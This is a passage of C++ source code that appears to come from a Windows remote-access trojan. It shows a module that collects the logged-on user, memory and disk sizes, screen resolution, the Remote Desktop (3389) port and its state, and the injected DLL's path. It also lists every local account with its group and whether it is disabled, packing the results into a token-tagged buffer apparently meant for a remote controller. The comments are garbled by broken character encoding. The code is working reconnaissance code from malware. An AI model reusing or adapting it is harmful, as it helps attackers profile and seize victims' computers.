//<2F><>ȡ<EFBFBD>û<EFBFBD><C3BB><EFBFBD>========================
|
||
Get_LogUser(pSysInfo->szUserName,sizeof(pSysInfo->szUserName));
|
||
//////////////////////////////////////////////////////////////////////////
|
||
MEMORYSTATUSEX Meminfo;
|
||
unsigned __int64 dSize;
|
||
memset(&Meminfo, 0, sizeof(Meminfo));
|
||
Meminfo.dwLength = sizeof(Meminfo);
|
||
GlobalMemoryStatusEx(&Meminfo);
|
||
|
||
// <20>ڴ<EFBFBD>
|
||
dSize = (unsigned __int64)Meminfo.ullTotalPhys;
|
||
dSize = dSize /1024/1024+1;
|
||
pSysInfo->szMemory = dSize;
|
||
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>
|
||
dSize = (unsigned __int64)Meminfo.ullAvailPhys;
|
||
dSize = dSize /1024/1024+1;
|
||
pSysInfo->szMemoryFree = dSize;
|
||
|
||
ULARGE_INTEGER nTotalBytes,
|
||
nTotalFreeBytes,
|
||
nTotalAvailableBytes;
|
||
ULONG nAllGB = 0,
|
||
nFreeGB = 0;
|
||
DWORD drivertype;
|
||
char driver[10] = {0};
|
||
for(int i=0; i<26; i++)
|
||
{
|
||
driver[0] = i + ('B');
|
||
driver[1] = (':');
|
||
driver[2] = ('\\');
|
||
driver[3] = 0;
|
||
|
||
drivertype = GetDriveType(driver);
|
||
if(drivertype!=DRIVE_FIXED)
|
||
continue;
|
||
GetDiskFreeSpaceEx(driver,&nTotalAvailableBytes,&nTotalBytes,&nTotalFreeBytes);
|
||
nAllGB = nAllGB + nTotalBytes.QuadPart/1024/1024/1024;
|
||
nFreeGB = nFreeGB + nTotalFreeBytes.QuadPart/1024/1024/1024;
|
||
}
|
||
// Ӳ<><D3B2>
|
||
pSysInfo->szDriveSize = nAllGB;
|
||
// <20><><EFBFBD><EFBFBD>Ӳ<EFBFBD><D3B2>
|
||
pSysInfo->szDriveFreeSize = nFreeGB;
|
||
|
||
//<2F><>ȡԶ<C8A1>̶˿<CCB6>
|
||
Get3389Port(pSysInfo->szRemotePort,sizeof(pSysInfo->szRemotePort));
|
||
|
||
// <20><>ȡ3389״̬
|
||
Get3389State(pSysInfo->szOpenInfo,sizeof(pSysInfo->szOpenInfo));
|
||
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>λ<EFBFBD><CEBB>
|
||
GetModuleFileName(hDllModule,pSysInfo->szDLLPath,sizeof(pSysInfo->szDLLPath));
|
||
|
||
// <20>ֱ<EFBFBD><D6B1><EFBFBD>
|
||
wsprintf(pSysInfo->szScrxy,"%d * %d",GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN));
|
||
|
||
return;
|
||
}
|
||
|
||
|
||
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
||
LPBYTE CSystemManager::getSysUserList()
|
||
{
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʼ
|
||
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
|
||
lpBuffer[0] = TOKEN_USLIST;
|
||
DWORD dwOffset = 1;
|
||
|
||
char user_name[50];
|
||
char group_name[50];
|
||
|
||
LPUSER_INFO_0 bufptr = NULL;
|
||
LPUSER_INFO_0 pTmpBuf = NULL;
|
||
LPUSER_INFO_1 puiVal = NULL;
|
||
LPLOCALGROUP_USERS_INFO_0 pBuf = NULL;
|
||
DWORD dwLevel = 0,
|
||
dwEntriesRead = 0,
|
||
dwTotalEntries = 0,
|
||
dwResumeHandle = 0,
|
||
dwPrefMaxLen = MAX_PREFERRED_LENGTH;
|
||
|
||
NET_API_STATUS nStatus = NetUserEnum(NULL,dwLevel,FILTER_NORMAL_ACCOUNT,(LPBYTE*)&bufptr,dwPrefMaxLen,&dwEntriesRead,&dwTotalEntries,&dwResumeHandle);
|
||
|
||
if((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
|
||
{
|
||
if((pTmpBuf = bufptr) != NULL)
|
||
{
|
||
|
||
for(DWORD i=0;i<dwEntriesRead;++i)
|
||
{
|
||
memset(user_name,0,sizeof(user_name));
|
||
wcstombs(user_name,pTmpBuf->usri0_name,50);
|
||
|
||
memcpy(lpBuffer + dwOffset, user_name, lstrlen(user_name)+1);
|
||
dwOffset += lstrlen(user_name)+1;
|
||
|
||
|
||
memset(group_name,0,sizeof(group_name));
|
||
|
||
DWORD dwRead = 0,
|
||
dwEntries = 0;
|
||
NET_API_STATUS nStatus = NetUserGetLocalGroups(
|
||
NULL,
|
||
pTmpBuf->usri0_name,
|
||
dwLevel,
|
||
LG_INCLUDE_INDIRECT,
|
||
(LPBYTE*)&pBuf,
|
||
dwPrefMaxLen,
|
||
&dwRead,
|
||
&dwEntries);
|
||
|
||
|
||
if(nStatus == NERR_Success&&pBuf)
|
||
wcstombs(group_name,pBuf->lgrui0_name,50);
|
||
else
|
||
strcpy(group_name,"error");
|
||
|
||
memcpy(lpBuffer + dwOffset, group_name, lstrlen(group_name) + 1);
|
||
dwOffset += lstrlen(group_name) + 1;
|
||
|
||
|
||
char *GetInfo="<EFBFBD><EFBFBD>Ծ";
|
||
if(NERR_Success == NetUserGetInfo(NULL,pTmpBuf->usri0_name, 1, (LPBYTE *)&puiVal))
|
||
if((puiVal->usri1_flags & UF_ACCOUNTDISABLE))
|
||
GetInfo="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>";
|
||
|
||
memcpy(lpBuffer + dwOffset, GetInfo, lstrlen(GetInfo) + 1);
|
||
dwOffset += lstrlen(GetInfo) + 1;
|
||
|
||
pTmpBuf++;
|
||
}
|
||
}
|
||
else
|
||
goto ERRO;
|
||
}
|
||
else
|
||
{
|
||
ERRO:
|
||
LocalFree(lpBuffer);
|
||
return NULL;
|
||
}
|
||
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
|
||
if(bufptr)
|
||
NetApiBufferFree(bufptr);
|
||
|
||
if(puiVal)
|
||
NetApiBufferFree(puiVal);
|
||
|
||
if (pBuf)
|
||
NetApiBufferFree(pBuf);
|
||
|
||
return lpBuffer;
|
||
} |